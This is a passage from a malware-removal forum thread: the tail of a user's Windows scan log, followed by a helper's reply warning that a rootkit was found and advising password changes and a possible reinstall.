Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000Core.job => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA.job => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA1cfeb0948c7c370.job => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe

 

==================== Loaded Modules (whitelisted) =============

 

2012-01-04 07:03 - 2009-11-04 13:14 - 00157696 _____ () C:\Windows\system32\spool\PRTPROCS\W32X86\lxecdrpp.dll

2014-01-20 13:17 - 2014-01-20 13:17 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll

2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll

2011-04-30 00:41 - 2011-03-02 13:40 - 00140288 _____ () C:\Program Files\WinRAR\rarext.dll

2013-02-12 21:37 - 2013-02-12 21:37 - 01263952 _____ () C:\Program Files\DivX\DivX Update\DivXUpdate.exe

2013-02-12 21:38 - 2013-02-12 21:38 - 00100688 _____ () C:\Program Files\DivX\DivX Update\DivXUpdateCheck.dll

2009-03-15 21:15 - 2008-12-22 05:32 - 00054784 _____ () C:\Windows\System32\bcmwlrmt.dll

2009-07-17 21:46 - 2011-08-17 23:16 - 03077528 _____ () C:\Program Files\Pando Networks\Media Booster\PMB.exe

2014-10-17 02:42 - 2014-10-17 02:42 - 00284160 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\df2a920b8e863d14ab8503f96c7b3ecd\VistaBridgeLibrary.ni.dll

 

==================== Alternate Data Streams (whitelisted) =========

 

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

 

AlternateDataStreams: C:\ProgramData\TEMP:5D432CE3

 

==================== Safe Mode (whitelisted) ===================

 

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

 

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

 

==================== EXE Association (whitelisted) =============

 

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

 

 

==================== MSCONFIG/TASK MANAGER disabled items =========

 

(Currently there is no automatic fix for this section.)

 

MSCONFIG\Services: AESTFilters => 2

MSCONFIG\Services: Apple Mobile Device => 2

MSCONFIG\Services: asurscsi => 2

MSCONFIG\Services: Bonjour Service => 2

MSCONFIG\Services: DockLoginService => 2

MSCONFIG\Services: GameConsoleService => 3

MSCONFIG\Services: GoToAssist => 3

MSCONFIG\Services: gupdate => 2

MSCONFIG\Services: gupdatem => 3

MSCONFIG\Services: gusvc => 3

MSCONFIG\Services: hnmsvc => 2

MSCONFIG\Services: IAANTMON => 2

MSCONFIG\Services: iPod Service => 3

MSCONFIG\Services: lxec_device => 2

MSCONFIG\Services: SkypeUpdate => 2

MSCONFIG\Services: sprtsvc_DellSupportCenter => 2

MSCONFIG\Services: Steam Client Service => 3

MSCONFIG\Services: stllssvr => 3

MSCONFIG\Services: UMVPFSrv => 2

 

========================= Accounts: ==========================

 

Administrator (S-1-5-21-879967681-4271235005-1519339517-500 - Administrator - Disabled)

Guest (S-1-5-21-879967681-4271235005-1519339517-501 - Limited - Disabled)

Tyler (S-1-5-21-879967681-4271235005-1519339517-1000 - Administrator - Enabled) => C:\Users\Tyler

 

==================== Faulty Device Manager Devices =============

 

Name: Teredo Tunneling Pseudo-Interface

Description: Microsoft Tun Miniport Adapter

Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}

Manufacturer: Microsoft

Service: tunmp

Problem: : This device cannot start. (Code10)

Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.

On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

 

 

==================== Event log errors: =========================

 

Application errors:

==================

Error: (11/13/2014 06:45:33 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/09/2014 03:42:39 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/09/2014 07:16:35 AM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/09/2014 04:00:11 AM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application iexplore.exe, version 9.0.8112.16584, time stamp 0x4549b14e, faulting module MSHTML.dll, version 9.0.8112.16584, time stamp 0x541cb3c5, exception code 0xc0000005, fault offset 0x00260cee,

process id 0x2f00, application start time 0xiexplore.exe0.

 

Error: (11/09/2014 03:57:16 AM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\JS> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (11/09/2014 03:57:16 AM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\JS> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES\WHITE-ON-BLACK> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES\WHITE-ON-BLACK> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

 

System errors:

=============

Error: (11/13/2014 06:48:34 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

 

Error: (11/13/2014 06:48:26 PM) (Source: Service Control Manager) (EventID: 7022) (User: )

Description: McAfee Home Network

 

Error: (11/13/2014 06:47:21 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)

Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)

 

Error: (11/13/2014 06:46:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: Intel® PRO/1000 NDIS 6 Adapter Driver%%1058

 

Error: (11/13/2014 06:46:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: Intel® PRO/1000 PCI Express Network Connection Driver%%1058

 

Error: (11/09/2014 03:46:42 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

 

Error: (11/09/2014 03:46:32 PM) (Source: Service Control Manager) (EventID: 7022) (User: )

Description: McAfee Home Network

 

Error: (11/09/2014 03:45:09 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)

Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)

 

Error: (11/09/2014 03:43:47 PM) (Source: Service Control Manager) (EventID: 7011) (User: )

Description: 30000WSearch

 

Error: (11/09/2014 03:43:47 PM) (Source: Service Control Manager) (EventID: 7011) (User: )

Description: 30000WerSvc

 

 

Microsoft Office Sessions:

=========================

 

CodeIntegrity Errors:

===================================

  Date: 2014-11-13 19:00:51.252

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-13 19:00:50.347

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-13 19:00:49.474

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-13 19:00:48.538

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-13 18:46:02.171

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-09 15:43:40.602

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-09 07:16:24.156

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-09 07:16:23.235

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-09 06:04:55.240

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-09 06:04:51.421

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

 

==================== Memory info =========================== 

 

Processor: Pentium® Dual-Core CPU T4200 @ 2.00GHz

Percentage of memory in use: 53%

Total physical RAM: 3033.63 MB

Available physical RAM: 1413.15 MB

Total Pagefile: 6269.51 MB

Available Pagefile: 4625.14 MB

Total Virtual: 2047.88 MB

Available Virtual: 1892.57 MB

 

==================== Drives ================================

 

Drive c: (OS) (Fixed) (Total:218.2 GB) (Free:35.52 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

Drive e: (RECOVERY) (Fixed) (Total:14.65 GB) (Free:8.72 GB) NTFS

 

==================== MBR & Partition Table ==================

 

========================================================

Disk: 0 (Size: 232.9 GB) (Disk ID: 2F03C1E0)

Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)

Partition 2: (Not Active) - (Size=14.6 GB) - (Type=07 NTFS)

Partition 3: (Active) - (Size=218.2 GB) - (Type=07 NTFS)

 

==================== End Of Log ============================

Link to post
Share on other sites

One or more of the identified infections is related to a nasty rootkit component which is difficult to remove. Rootkits and backdoor Trojans are very dangerous because they use advanced techniques (backdoors) as a means of accessing a computer system that bypasses security mechanisms and steal sensitive information which they send back to the hacker. Many rootkits can hook into the Windows 32-bit kernel, and patch several APIs to hide new registry keys and files they install. Remote attackers use backdoor Trojans and rootkits as part of an exploit to gain unauthorized access to a computer and take control of it without your knowledge.

If your computer was used for online banking, has credit card information or other sensitive data on it, you should immediately disconnect from the Internet until your system is cleaned. All passwords should be changed immediately to include those used for banking, email, eBay, paypal and online forums from a CLEAN COMPUTER. You should consider them to be compromised. You should change each password by using a different computer and not the infected one. If not, an attacker may get the new passwords and transaction information. If using a router, you need to reset it with a strong logon/password so the malware cannot gain control before connecting again. Banking and credit card institutions should be notified of the possible security breach. Because your computer was compromised please read How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?

Although the rootkit has been identified and may be removed, your PC has likely been compromised and there is no way to be sure the computer can ever be trusted again. It is dangerous and incorrect to assume that because this malware has been removed the computer is now secure. In some instances an infection may have caused so much damage to your system that it cannot be completely cleaned or repaired. The malware may leave so many remnants behind that security tools cannot find them. Many experts in the security community believe that once infected with this type of malware, the best course of action is to wipe the drive clean, delete the partition, reformat and reinstall the Operating System.

Please read:

Should you decide not to follow this advice, we will do our best to help clean the computer of any infections but we cannot guarantee it to be trustworthy or that the removal will be successful. If you wish to proceed, disinfection will require more time and more advanced tools.

Please let us know how you would like to proceed.

Link to post
Share on other sites

  • 3 months later...
Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.